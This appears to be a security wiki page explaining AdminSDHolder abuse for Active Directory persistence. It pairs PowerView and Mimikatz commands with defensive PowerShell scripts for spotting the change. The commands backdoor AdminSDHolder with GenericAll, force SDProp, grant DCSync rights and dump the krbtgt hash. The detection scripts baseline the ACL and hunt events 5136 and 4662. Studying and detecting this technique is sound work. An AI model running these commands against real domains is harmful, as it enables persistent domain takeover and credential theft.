# Abusing AdminSDHolder for Persistence

`AdminSDHolder` is a special AD container with some "default" security permissions that is used as a template for protected AD accounts and groups (like Domain Admins, Enterprise Admins, etc.) to prevent their accidental and unintended modifications, and to keep them secure.

`AdminSDHolder` is an object located in the System partition of Active Directory (`cn=adminsdholder,cn=system,dc=domain,dc=com`) and is used as a security template for objects that are members of certain privileged groups. Objects in these groups are enumerated, and any object whose security descriptor does not match the AdminSDHolder ACL is flagged for updating. The Security Descriptor Propagator (SDProp) process runs every 60 minutes on the PDC Emulator and re-stamps the object's Access Control List (ACL) with the security permissions set on AdminSDHolder.

Once you have gained Domain Admin privileges, the `AdminSDHolder` container can be backdoored by granting your user `GenericAll` on it; because SDProp copies that permission onto every protected group and account, this effectively makes that user a Domain Admin.
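Because SDProp copies whatever sits on AdminSDHolder onto every protected object, the defensive check is to watch the template itself. The following script is an added example, not code from the original page or from PowerView: it records the explicit ACEs on AdminSDHolder as a known-good baseline and, on later runs, reports any ACE that was not there before. It assumes the RSAT `ActiveDirectory` module (which provides the `AD:` drive) and a reader with permission to read the object's security descriptor; the baseline file path is a hypothetical placeholder.

```powershell
# Added example (not from the original page): compare the explicit ACEs on the
# AdminSDHolder object against a saved known-good baseline and flag anything new.
# Assumes the RSAT ActiveDirectory module (it provides the AD: drive) and a domain
# account allowed to read the object's security descriptor.
Import-Module ActiveDirectory

$domain   = Get-ADDomain
$holderDN = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
$baseline = 'C:\baseline\adminsdholder-aces.json'   # hypothetical path, choose your own

# Collect the explicit (non-inherited) ACEs; these are what SDProp stamps onto
# protected groups and accounts.
$acl  = Get-Acl -Path "AD:\$holderDN"
$aces = @($acl.Access | Where-Object { -not $_.IsInherited } | ForEach-Object {
    [pscustomobject]@{
        Trustee    = $_.IdentityReference.Value
        Rights     = $_.ActiveDirectoryRights.ToString()
        Type       = $_.AccessControlType.ToString()
        ObjectType = $_.ObjectType.ToString()   # GUID of the property/extended right, or all zeros
    }
})

if (-not (Test-Path -Path $baseline)) {
    # First run: record the current state. Only do this on a domain you have
    # already verified as clean, otherwise you baseline the backdoor.
    ConvertTo-Json -InputObject $aces -Depth 3 | Set-Content -Path $baseline
    Write-Host "Baseline written to $baseline ($($aces.Count) explicit ACEs)"
    return
}

$known = @(Get-Content -Path $baseline -Raw | ConvertFrom-Json)
$added = @(Compare-Object -ReferenceObject $known -DifferenceObject $aces `
              -Property Trustee, Rights, Type, ObjectType |
          Where-Object { $_.SideIndicator -eq '=>' })

# Rights that let a trustee take over every protected object once propagated.
$takeover = 'GenericAll', 'WriteDacl', 'WriteOwner', 'GenericWrite', 'WriteProperty'
foreach ($ace in $added) {
    $severity = if ($takeover | Where-Object { $ace.Rights -match $_ }) { 'HIGH' } else { 'review' }
    Write-Warning "[$severity] new ACE on AdminSDHolder: $($ace.Trustee) -> $($ace.Rights) ($($ace.Type))"
}
if ($added.Count -eq 0) { Write-Host 'AdminSDHolder ACL matches the baseline.' }
```

Run it once on a domain you have already verified to create the baseline, then on a schedule from a monitoring host; a `GenericAll` entry for an ordinary user account is the exact artefact the technique on this page leaves behind. The baseline approach is deliberate: the default AdminSDHolder trustees vary by forest functional level and locale, so diffing against your own clean state is more reliable than a hard-coded list.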

## How it Works

Abusing the AdminSDHolder container with `PowerView` by adding an ACE that grants user `fcastel` `GenericAll` rights, which SDProp then propagates to the `Domain Admins` group:

```
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName fcastel -Verbose -Rights All
```

![](/files/-MZp97kI7FF17n9eOUEd)

Normally the change propagates at the next SDProp run, which can take up to 60 minutes. To force propagation sooner, use `Invoke-SDPropagator.ps1`:

```
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
```

![](/files/-MZp9LCMkMhD5UCnVjXh)

Now, confirm that the user `fcastel` has `GenericAll` privileges on the `Domain Admins` group:

```
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'fcastel'}
```

![](/files/-MZp9ORjxOqnM0gjN6JK)

This can then be abused to grant the same user `DCSync` rights on the domain object:

```
Add-ObjectAcl -TargetDistinguishedName 'DC=marvel,DC=local' -PrincipalSamAccountName fcastel -Rights DCSync -Verbose
```

![](/files/-MZp9RuPYKXs_HaGQmG4)

Execute DCSync:

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:marvel\krbtgt"'
```

![](/files/-MZp9VK_G6eq7yfhpplT)
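Each step above leaves a trace in the Security log of a domain controller: writing the ACL of AdminSDHolder records a 5136 (directory service object modified) for its `nTSecurityDescriptor` attribute, and running DCSync exercises the replication extended rights, which records a 4662 carrying their GUIDs. The hunt below is an added example, not code from the original page; it assumes the "Audit Directory Service Changes" and "Audit Directory Service Access" subcategories are enabled and that AdminSDHolder and the domain head carry a SACL for write and control access, otherwise the events are never generated.

```powershell
# Added example (not from the original page): hunt a domain controller's Security
# log for the two traces this technique leaves. Assumes the "Audit Directory Service
# Changes" and "Audit Directory Service Access" subcategories are enabled and that
# the AdminSDHolder object and the domain head carry a SACL for write/control access.
$since = (Get-Date).AddDays(-7)

# Flatten the EventData block of a Security event into a hashtable keyed by field name.
function ConvertFrom-EventData {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    return $data
}

# 1) Event 5136: the nTSecurityDescriptor attribute of AdminSDHolder was written.
#    OperationType %%14674 = value added, %%14675 = value deleted.
$changes = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136; StartTime = $since } -ErrorAction SilentlyContinue
foreach ($e in $changes) {
    $d = ConvertFrom-EventData $e
    if ($d.ObjectDN -like 'CN=AdminSDHolder,CN=System,*' -and $d.AttributeLDAPDisplayName -eq 'nTSecurityDescriptor') {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            Event   = 5136
            Who     = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
            Finding = "AdminSDHolder ACL modified ($($d.OperationType))"
        }
    }
}

# 2) Event 4662: the replication extended rights that DCSync needs were exercised.
#    GUIDs of DS-Replication-Get-Changes and DS-Replication-Get-Changes-All.
$replGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
$access = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662; StartTime = $since } -ErrorAction SilentlyContinue
foreach ($e in $access) {
    $d = ConvertFrom-EventData $e
    $usesRepl = $replGuids | Where-Object { $d.Properties -match $_ }
    # Domain controllers replicate legitimately; their computer accounts end in '$'.
    if ($usesRepl -and $d.SubjectUserName -notlike '*$') {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            Event   = 4662
            Who     = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
            Finding = "replication rights used in logon session $($d.SubjectLogonId) (possible DCSync)"
        }
    }
}
```

Run it on the PDC Emulator first, since SDProp executes there and the ACL write lands on whichever DC the operator was bound to; forward both event IDs to your SIEM rather than polling each DC. Expect legitimate 4662 hits from directory synchronisation service accounts (for example the one used by Entra Connect), so maintain an allow-list of those principals and alert on everything else.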

## Resources

- https://attack.stealthbits.com/adminsdholder-modification-ad-persistence
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
- https://adsecurity.org/?p=1906
